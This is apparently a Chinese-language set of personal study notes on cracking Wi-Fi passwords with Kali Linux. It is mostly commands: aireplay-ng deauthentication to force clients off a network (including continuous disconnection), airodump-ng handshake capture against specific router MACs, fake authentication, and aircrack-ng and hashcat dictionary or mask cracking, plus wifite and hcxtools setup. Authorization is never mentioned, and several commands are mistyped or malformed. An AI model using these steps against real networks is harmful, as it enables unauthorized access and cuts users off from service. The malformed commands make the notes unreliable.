无线渗透学习笔记使用kali系统抓握手包以及跑字典相关
當前網卡
Current MAC: 1c:bf:ce:b6:42:06 (unknown)
Permanent MAC: 1c:bf:ce:b6:42:06 (unknown)
- 抓握手包
airodump-ng -c 4 --bssid EC:41:18:28:03:40 -w hach wlan0mon
開啟監聽模式
airmon-ng start wlan0
查看wifi網卡信息
iwconfig
嗅探wifi
airodump-ng wlan0mon
攻擊
aireplay-ng -0 1 –a EC:41:18:28:03:40 -c 08:ED:B9:89:FB:B1 wlan0mon
- -0 Deautenticate 沖突模式
使已經連接的合法客戶端強制斷開與路由端的連接,使其重新連接。在重新連接過程中獲得驗證數據包,從而產生有效 ARP request。
如果一個客戶端連在路由端上,但是沒有人上網以產生有效數據,此時,即使用-3 也無法產生有效 ARP request。所以此時需要用-0 攻擊模式配合,-3 攻擊才會被立刻激活。
aireplay-ng -0 10 –a -c wifi0 參數說明:
【-0】:沖突攻擊模式,后面跟發送次數(設置為 0,則為循環攻擊,不停的斷開連接,客戶端無法正常上網)
【-a】:設置 ap 的 mac
【-c】:設置已連接的合法客戶端的 mac。
如果不設置-c,則斷開所有和 ap 連接的合法客戶端。
aireplay-ng -3 -b -h wifi0
aireplay-ng -3 -b EC:41:18:28:03:40 -h EC:41:18:28:03:40 wifi0
沖突模式
aireplay-ng -0 10 –a <ap mac> -c <my mac> wifi0
注:使用此攻擊模式的前提是必須有通過認證的合法的客戶端連接到路由器
- fake count
aireplay-ng --fakeauth 0 -a EC:41:18:28:03:40 -c 1c:bf:ce:b6:42:06 wlan0mon
查看wifi設備?不可用
airmon-ng show wlan device
開始嗅探
airmon-ng start wlan0網卡將從 wlan0 ->wlan0mon```
掃描wifi
airodump-ng wlan0mon
抓取握手包 handshake package
iairodump-ng -c 4 --bssid EC:41:18:28:03:40 -w hackdir wlan0mon
跑包tcpdump .cap后綴包
aircrack-ng -2 -b mac_address dic.txt resouce.cap
踢用戶
比如
aireplay-ng -0 10 -a EC:41:18:28:03:40 -c A2:4E:03:10:C7:73 wlan0mon
-c是用戶的手機mac地址,-a是路由器的mac也就是bssid地址
- 使用wifite
enter wifite scan wifi and client?
wifite ctrl+c choose number crack, all crack all
wifite默認字典
vim /usr/share/dict/wordlist-probable.txt
沖突問題解決
在虛擬機重新選擇網卡, 或者重啟kili或者執行
service network-manager stop,以及
airmon-ng check kill
安裝hcxdumptool
下載源碼編譯(使用root運行,Linux內核版本>=4.14) https://github.com/ZerBea/hcxdumptool/archive/4.2.0.tar.gz tarf -xvf 4.2.0.tar.gz cd hcxdumptool-4.2.0 make && make install # 編譯完成后的工具均安裝在/usr/local/bin/目錄下
hcxtools
安裝依賴軟件包,解決編譯報錯 apt-get install libcurl4-openssl-dev libssl-dev zlib1g-dev libpcap-dev #下載源碼編譯(使用root運行) wget https://github.com/ZerBea/hcxtools/archive/4.2.0.tar.gz tar -xvf 4.2.0.tar.gz cd hcxtools-4.2.0 make && make install # 編譯完成后的工具均安裝在/usr/local/bin/目錄下。
除了使用下載方法進行編譯外還可以使用進行修改 源編譯.
首先復制下面文本
#清華大學源 deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free #浙江大學源 deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free deb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free #官方源 #deb http://http.kali.org/kali kali-rolling main non-free contrib #deb-src http://http.kali.org/kali kali-rolling main non-free contrib #中科大 deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib #阿里云 #deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib #deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib #東軟大學 #deb http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib #deb-src http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib #重慶大學 #deb http://http.kali.org/kali kali-rolling main non-free contrib #deb-src http://http.kali.org/kali kali-rolling main non-free contrib ————————————————輸入命令
gedit到或者vim /etc/apt/sources.list
參考鏈接:https://blog.csdn.net/xsgjm/article/details/105847524
wifi crack hcxdumptool下載地址
https://github.com/ZerBea/hcxdumptool
跑字典
aircrack-ng -w /1.txt /root/use/cap.cap
攻擊wifi設備的標準步驟
Step 1:
輸入后你講看到這2個列,Station列代表的是mac地址,沒有的話,要么抓不到,要么是每用戶連接
Station: Frames ,
Step 2:
aireply-ng -0 10 -a AP_BSSID -C STATION_MAC_ADDRESS 10 is attach count, APP_BSSID IS WIFI_MAC_ADDRESSSTATION_MAC_ADDRESS IS YOU PHONE OR OTHER CLIENT MAC ADDRESSS
kali系統更新
apt-get upgradeupgrade all soft
apt-get update updateversion info
apt-get dist-upgradeupdate all system
跑包其它方法
EWSA 5.1.271破包工具 WIFIPR 中文漢化免安裝
字典生成的不說了,kali有命令…
linux好久沒玩了
sudo su切換超級用戶 需要輸入系統密碼.
passwd在su模式下可以修改密碼
以后執行su輸入密碼就行了
kali安裝的時候有一個設備路徑必須選擇,否則開啟啟動就黑屏.
關于虛擬機問題也有很多,15藍屏,修復藍屏又導致另外一個問題,反正就是一個死循環了,后面升級15搞定了.
最后關于密碼窮舉的問題普及一下,一種就是一個一個的連接嘗試,這樣非常慢,2秒嘗試一個密碼,
這個window用python腳本就行
還有一種就是抓用戶握手包,踢下線就能抓了,但是不是什么路由器都能查看到設備,或者能踢下線的.
抓到了加密包,就需要窮舉了,速度比那個還要好一點
下圖可以看出來基本上看不到設備數…
抓包和基本字典測試.
hashcat64 破解
hashcat64.exe -m 25000 -a -3 -2 ?l?d 2.hccapx ?2?2?2?2?2?2?2?2
cap轉capx
aircrack-ng 文件名 -j 新文件.
最后補充:
kali里面如果vmtool弄不上可以重新添加cd設備,反復開機多次成功,桌面出現就代表成功了.
命令行執行的方式我試過,沒效果.
總結
以上是生活随笔為你收集整理的无线渗透学习笔记使用kali系统抓握手包以及跑字典相关的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: OpenStack Days China
- 下一篇: 通过rundll32调用系统对话框